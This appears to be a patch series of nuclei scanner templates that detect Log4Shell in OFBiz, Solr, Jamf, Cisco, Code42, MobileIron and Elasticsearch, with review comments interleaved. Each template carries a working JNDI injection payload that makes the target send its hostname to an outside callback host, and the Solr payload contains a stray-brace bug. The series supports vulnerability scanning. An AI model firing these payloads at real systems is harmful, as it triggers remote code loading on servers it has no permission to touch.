From 3cf8d0bd94e4b63ee8bd4320c9fe17b1295c581c Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 3 May 2023 17:21:48 +0530
Subject: [PATCH 01/10] Update All Existing Log4j Templates

---
 .../vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
index 6945955a8d1..b5b082566d5 100644
--- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
+++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
@@ -21,12 +21,16 @@ info:
 shodan-query: http.html:"Apache OFBiz"
 tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
 GET /webtools/control/main HTTP/1.1
 Host: {{Hostname}}
- Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
+ Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}

 matchers-condition: and
 matchers:
@@ -38,13 +42,13 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 extractors:
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by mp on 2022/05/27

From b50e22b7daa75f6f66bbab39b80d20aa682cb8cb Mon Sep 17 00:00:00 2001
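Review bot: The comment on the new matcher regex in the second hunk, `# Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output`, was copied from the extractor below it; a matcher prints nothing, so it should read `# Match the 6-digit marker followed by ${hostName} in the callback`. The same copied comment sits on the matcher in every other template of this series (solr, jamf-pro, cloudcenter, cisco-unified, vmanage, code42, jamf, mobileiron, elasticsearch5, goanywhere, graylog, metabase, opennms, rundeck, unifi). Separately, `\d{6}\.` accepts any six digits rather than the two values this request sent, so the callback is correlated by shape only; if the engine expands template variables inside matcher patterns, `{{rand1}}{{rand2}}\.` would tie the interaction to this specific request, which is the point of generating the values in the first place.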
From: Ritik Chaddha
Date: Wed, 3 May 2023 23:21:44 +0530
Subject: [PATCH 02/10] updated log4j

---
 .../apache/apache-solr-log4j-rce.yaml | 11 +++++++---
 .../apache/log4j/jamf-pro-log4j-rce.yaml | 18 ++++++++++-------
 .../cisco/cisco-cloudcenter-suite-rce.yaml | 11 +++++++---
 .../cisco-unified-communications-log4j.yaml | 10 +++++++---
 .../cisco/cisco-vmanage-log4j.yaml | 16 ++++++++++++---
 .../code42/code42-log4j-rce.yaml | 20 ++++++++++++++++---
 .../jamf/jamf-log4j-jndi-rce.yaml | 20 ++++++++++++++++---
 .../mobileiron/mobileiron-log4j-jndi-rce.yaml | 20 ++++++++++++++++---
 8 files changed, 98 insertions(+), 28 deletions(-)

diff --git a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
index d7d78ec319a..4aea6038dd3 100644
--- a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
+++ b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
@@ -23,11 +23,15 @@ info:
 shodan-query: http.html:"Apache Solr"
 tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
 @timeout: 25s
- GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1
+ GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-%7B%7Brand1%7D%7D%7D%24%7B%3A-%7B%7Brand2%7D%7D%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
 Host: {{Hostname}}

 attack: clusterbomb
@@ -51,10 +55,11 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 extractors:
 - type: regex
 part: interactsh_request
+ group: 1
 regex:
- - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
diff --git a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml
index 8c7155c1953..da77e938cc7 100644
--- a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml
+++ b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml
@@ -22,6 +22,10 @@ info:
 verified: "true"
 tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -31,7 +35,7 @@ http:
 Referer: {{RootURL}}
 Content-Type: application/x-www-form-urlencoded

- username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
+ username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&password=

 matchers-condition: and
 matchers:
@@ -40,21 +44,21 @@ http:
 words:
 - "dns"

- - type: regex
- part: interactsh_request
- regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
-
 - type: word
 part: body
 words:
 - "Jamf Pro Login"

+ - type: regex
+ part: interactsh_request
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
+
 extractors:
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by mp on 2022/05/27
diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml
index 1fccd42a9ae..218b8ae0f89 100644
--- a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml
+++ b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml
@@ -21,13 +21,17 @@ info:
 shodan-query: title:"CloudCenter Suite"
 tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
 @timeout: 10s
 POST /suite-auth/login HTTP/1.1
 Host: {{Hostname}}
- Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
+ Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}
 Content-Type: application/json

 {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
@@ -42,7 +46,7 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 - type: word
 part: header
@@ -54,10 +58,11 @@ http:
 kval:
 - interactsh_ip # Print remote interaction IP in output

+ extractors:
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by md on 2023/03/22
diff --git a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml
index 46eb5388115..135e266a538 100644
--- a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml
+++ b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml
@@ -19,6 +19,10 @@ info:
 verified: "true"
 tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -28,7 +32,7 @@ http:
 Origin: {{BaseURL}}
 Referer: {{BaseURL}}/ccmadmin/showHome.do

- appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
+ appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=admin

 matchers-condition: and
 matchers:
@@ -40,7 +44,7 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 extractors:
 - type: kval
@@ -51,6 +55,6 @@ http:
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by md on 2022/10/04
diff --git a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml
index f351b2e1c4a..dfce16b4afc 100644
--- a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml
+++ b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml
@@ -19,6 +19,10 @@ info:
 verified: "true"
 tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -29,7 +33,7 @@ http:
 Origin: {{BaseURL}}
 Referer: {{BaseURL}}

- j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In
+ j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=admin&submit=Log+In

 matchers-condition: and
 matchers:
@@ -41,7 +45,7 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 - type: word
 part: body
@@ -53,10 +57,16 @@ http:
 kval:
 - interactsh_ip # Print remote interaction IP in output

+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by CS 03/27/2023
diff --git a/http/vulnerabilities/code42/code42-log4j-rce.yaml b/http/vulnerabilities/code42/code42-log4j-rce.yaml
index 6d11e828ccf..abbd0c80d8a 100644
--- a/http/vulnerabilities/code42/code42-log4j-rce.yaml
+++ b/http/vulnerabilities/code42/code42-log4j-rce.yaml
@@ -22,10 +22,14 @@ info:
 cwe-id: CWE-77
 tags: jndi,log4j,rce,cve,cve2021,oast,code42,kev

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - method: GET
 path:
- - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
+ - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&url=https://localhost'

 matchers-condition: and
 matchers:
@@ -37,13 +41,23 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by mp on 2022/05/27
diff --git a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
index 29572e5f487..a54153a2519 100644
--- a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
+++ b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
@@ -21,6 +21,10 @@ info:
 verified: "true"
 tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -30,7 +34,7 @@ http:
 Referer: {{RootURL}}
 Content-Type: application/x-www-form-urlencoded

- username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
+ username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&password=

 matchers-condition: and
 matchers:
@@ -47,13 +51,23 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by md on 2023/03/23
diff --git a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
index e7e3f3639ab..7ac2f291001 100644
--- a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
+++ b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
@@ -22,6 +22,10 @@ info:
 verified: "true"
 tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -29,7 +33,7 @@ http:
 Referer: {{RootURL}}/mifs/user/login.jsp
 Content-Type: application/x-www-form-urlencoded

- j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
+ j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=password&logincontext=employee

 matchers-condition: and
 matchers:
@@ -46,13 +50,23 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 # Enhanced by md on 2023/03/23

From 89185ad7fe866853c1cd04d27dd930cf29fd4633 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 3 May 2023 23:31:55 +0530
Subject: [PATCH 03/10] fix

---
 .../vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml
index 218b8ae0f89..d25ab91b691 100644
--- a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml
+++ b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml
@@ -58,7 +58,12 @@ http:
 kval:
 - interactsh_ip # Print remote interaction IP in output

- extractors:
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1

From 8da408f77c6d5286129bc8e622807561d1e01a9d Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 3 May 2023 23:42:07 +0530
Subject: [PATCH 04/10] name update=id

---
 ...nter-suite-rce.yaml => cisco-cloudcenter-suite-log4j-rce.yaml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename http/vulnerabilities/cisco/{cisco-cloudcenter-suite-rce.yaml => cisco-cloudcenter-suite-log4j-rce.yaml} (100%)

diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml
similarity index 100%
rename from http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml
rename to http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml

From 82a852697851fab31799d3da1dbe638dd62528fb Mon Sep 17 00:00:00 2001
From: Ritik Chaddha
Date: Wed, 3 May 2023 23:51:23 +0530
Subject: [PATCH 05/10] updated templates

---
 .new-additions | 73 ++++++++++++++-----
 .../apache/apache-solr-log4j-rce.yaml | 12 ++-
 .../other/elasticsearch5-log4j-rce.yaml | 16 +++-
 .../other/goanywhere-mft-log4j-rce.yaml | 16 +++-
 http/vulnerabilities/other/graylog-log4j.yaml | 16 +++-
 5 files changed, 105 insertions(+), 28 deletions(-)

diff --git a/.new-additions b/.new-additions
index 0265ab9a90b..7d2c21d7bc0 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,18 +1,55 @@
-http/cves/2020/CVE-2020-27481.yaml
-http/cves/2021/CVE-2021-30175.yaml
-http/cves/2021/CVE-2021-44228.yaml
-http/cves/2023/CVE-2023-1671.yaml
-http/cves/2023/CVE-2023-20864.yaml
-http/cves/2023/CVE-2023-27350.yaml
-http/cves/2023/CVE-2023-27524.yaml
-http/cves/2023/CVE-2023-29489.yaml
-http/cves/2023/CVE-2023-29922.yaml
-http/default-logins/powerjob-default-login.yaml
-http/default-logins/umami/umami-default-login.yaml
-http/exposed-panels/papercut-ng-panel.yaml
-http/exposed-panels/proxmox-panel.yaml
-http/exposed-panels/sophos-web-appliance.yaml
-http/misconfiguration/apache/apache-zeppelin-unauth.yaml
-http/osint/mail-archive.yaml
-http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
-http/vulnerabilities/wordpress/wpml-xss.yaml
+cves/2017/CVE-2017-16894.yaml
+cves/2020/CVE-2020-10199.yaml
+cves/2021/CVE-2021-25078.yaml
+cves/2021/CVE-2021-35250.yaml
+cves/2022/CVE-2022-0747.yaml
+cves/2022/CVE-2022-0769.yaml
+cves/2022/CVE-2022-0773.yaml
+cves/2022/CVE-2022-0846.yaml
+cves/2022/CVE-2022-0864.yaml
+cves/2022/CVE-2022-1903.yaml
+cves/2022/CVE-2022-2219.yaml
+cves/2022/CVE-2022-24223.yaml
+cves/2022/CVE-2022-25485.yaml
+cves/2022/CVE-2022-25486.yaml
+cves/2022/CVE-2022-25487.yaml
+cves/2022/CVE-2022-25488.yaml
+cves/2022/CVE-2022-25489.yaml
+cves/2022/CVE-2022-25497.yaml
+cves/2022/CVE-2022-27926.yaml
+cves/2022/CVE-2022-28032.yaml
+cves/2022/CVE-2022-3062.yaml
+cves/2022/CVE-2022-37190.yaml
+cves/2022/CVE-2022-37191.yaml
+cves/2022/CVE-2022-38295.yaml
+cves/2022/CVE-2022-38296.yaml
+cves/2022/CVE-2022-38467.yaml
+cves/2022/CVE-2022-41441.yaml
+cves/2022/CVE-2022-42094.yaml
+cves/2022/CVE-2022-4321.yaml
+cves/2023/CVE-2023-0099.yaml
+cves/2023/CVE-2023-22620.yaml
+cves/2023/CVE-2023-22897.yaml
+cves/2023/CVE-2023-27008.yaml
+cves/2023/CVE-2023-27159.yaml
+cves/2023/CVE-2023-27179.yaml
+cves/2023/CVE-2023-29084.yaml
+default-logins/trassir/trassir-default-login.yaml
+exposed-panels/appwrite-panel.yaml
+exposed-panels/aspect-control-panel.yaml
+exposures/logs/yii-error-page.yaml
+misconfiguration/apollo-adminservice-unauth.yaml
+misconfiguration/default-spx-key.yaml
+misconfiguration/sql-server-report-viewer.yaml
+misconfiguration/thinkphp-errors.yaml
+network/detection/msmq-detect.yaml
+network/enumeration/beanstalk-service.yaml
+osint/hashnode.yaml
+osint/imgbb.yaml
+osint/rubygems.yaml
+technologies/default-apache-shiro.yaml
+technologies/switch-protocol.yaml
+vulnerabilities/generic/cache-poisoning-xss.yaml
+vulnerabilities/huawei/huawei-firewall-lfi.yaml
+vulnerabilities/others/universal-media-xss.yaml
+vulnerabilities/wordpress/ldap-wp-login-xss.yaml
diff --git a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
index 4aea6038dd3..8a234bf6bc8 100644
--- a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
+++ b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
@@ -31,7 +31,7 @@ http:
 - raw:
 - |
 @timeout: 25s
- GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-%7B%7Brand1%7D%7D%7D%24%7B%3A-%7B%7Brand2%7D%7D%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
+ GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
 Host: {{Hostname}}

 attack: clusterbomb
@@ -58,6 +58,16 @@ http:
 - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
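Review bot: The `.new-additions` hunk replaces the entire list and drops the `http/` prefix from every path, which does not match the subject `updated templates` and looks like a stale rebase artifact rather than an intended edit. If this file is maintained by tooling it should be left out of the commit; if it is hand-edited, the dropped prefix needs confirming against whatever consumes the list, since the removed entries all carried it.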
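Review bot: The new request line in the first apache-solr hunk has a stray `}` after the second variable: `%24%7B%3A-{{rand2}}}%7D` should be `%24%7B%3A-{{rand2}}%7D`, matching the elasticsearch5 and vmware-siterecovery lines elsewhere in this series. After substitution the extra brace most likely terminates the lookup early, so the callback host name is malformed and the template would report nothing on a host that is actually vulnerable; this is the only place in the series where the fixed-up encoding from this commit is itself broken.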
diff --git a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml
index 9b4cc42102c..aafce277c43 100644
--- a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml
+++ b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml
@@ -20,10 +20,14 @@ info:
 verified: "true"
 tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev

+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
- GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1
+ GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D HTTP/1.1
 Host: {{Hostname}}

 {
@@ -43,17 +47,23 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

 extractors:
 - type: kval
 kval:
 - interactsh_ip # Print remote interaction IP in output

